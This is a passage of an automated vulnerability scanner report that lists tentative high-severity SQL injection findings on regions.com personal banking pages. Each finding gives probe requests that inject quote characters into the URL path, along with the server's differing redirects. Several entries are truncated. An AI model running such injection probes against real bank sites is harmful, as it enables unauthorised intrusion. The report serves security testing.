Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/checking.rf

Issue detail

Request 1

GET /personal_banking'/checking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/checking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fchecking.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/checking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.130. https://www.regions.com/personal_banking/credit_cards.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/credit_cards.rf

Issue detail

Request 1

GET /personal_banking'/credit_cards.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/credit_cards.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 191

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fcredit_cards.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/credit_cards.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.131. https://www.regions.com/personal_banking/ehl.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/ehl.rf

Issue detail

Request 1

GET /personal_banking'/ehl.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/ehl.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 182

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fehl.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/ehl.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.132. https://www.regions.com/personal_banking/email_starting_net.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/email_starting_net.rf

Issue detail

Request 1

GET /personal_banking'/email_starting_net.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/email_starting_net.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2femail_starting_net.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/email_starting_net.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.133. https://www.regions.com/personal_banking/everyday_banking.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/everyday_banking.rf

Issue detail

Request 1

GET /personal_banking'/everyday_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/everyday_banking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2feveryday_banking.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/everyday_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.134. https://www.regions.com/personal_banking/get_started_online_statements.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/get_started_online_statements.rf

Issue detail

Request 1

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/get_started_online_statements.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 208

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fget_started_online_statements.rf">here</a>.</h2>
</body><
...[SNIP]...

Request 2

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.135. https://www.regions.com/personal_banking/home_equity_main.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/home_equity_main.rf

Issue detail

Request 1

GET /personal_banking'/home_equity_main.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/home_equity_main.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fhome_equity_main.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/home_equity_main.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.136. https://www.regions.com/personal_banking/insurance.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/insurance.rf

Issue detail

Request 1

GET /personal_banking'/insurance.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/insurance.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2finsurance.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/insurance.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.137. https://www.regions.com/personal_banking/investing.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/investing.rf

Issue detail

Request 1

GET /personal_banking'/investing.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/investing.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2finvesting.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/investing.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.138. https://www.regions.com/personal_banking/loan_payment_hardship.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/loan_payment_hardship.rf

Issue detail

Request 1

GET /personal_banking'/loan_payment_hardship.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/loan_payment_hardship.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 200

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2floan_payment_hardship.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/loan_payment_hardship.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.139. https://www.regions.com/personal_banking/loans_credit.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/loans_credit.rf

Issue detail

Request 1

GET /personal_banking'/loans_credit.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/loans_credit.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 191

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2floans_credit.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/loans_credit.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.140. https://www.regions.com/personal_banking/mobile_banking.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/mobile_banking.rf

Issue detail

Request 1

GET /personal_banking'/mobile_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/mobile_banking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 193

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fmobile_banking.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/mobile_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.141. https://www.regions.com/personal_banking/money_market_main.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/money_market_main.rf

Issue detail

Request 1

GET /personal_banking'/money_market_main.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/money_market_main.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fmoney_market_main.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/money_market_main.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.142. https://www.regions.com/personal_banking/morgan_keegan.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/morgan_keegan.rf

Issue detail

Request 1

GET /personal_banking'/morgan_keegan.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/morgan_keegan.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 192

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fmorgan_keegan.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/morgan_keegan.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.143. https://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/open_account.rf

Issue detail

Request 1

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/open_account.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 191

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fopen_account.rf">here</a>.</h2>
</body></html>

Request 2

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.144. https://www.regions.com/personal_banking/platinum_visa_check.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/platinum_visa_check.rf

Issue detail

Request 1

GET /personal_banking'/platinum_visa_check.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/platinum_visa_check.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 198

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fplatinum_visa_check.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/platinum_visa_check.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
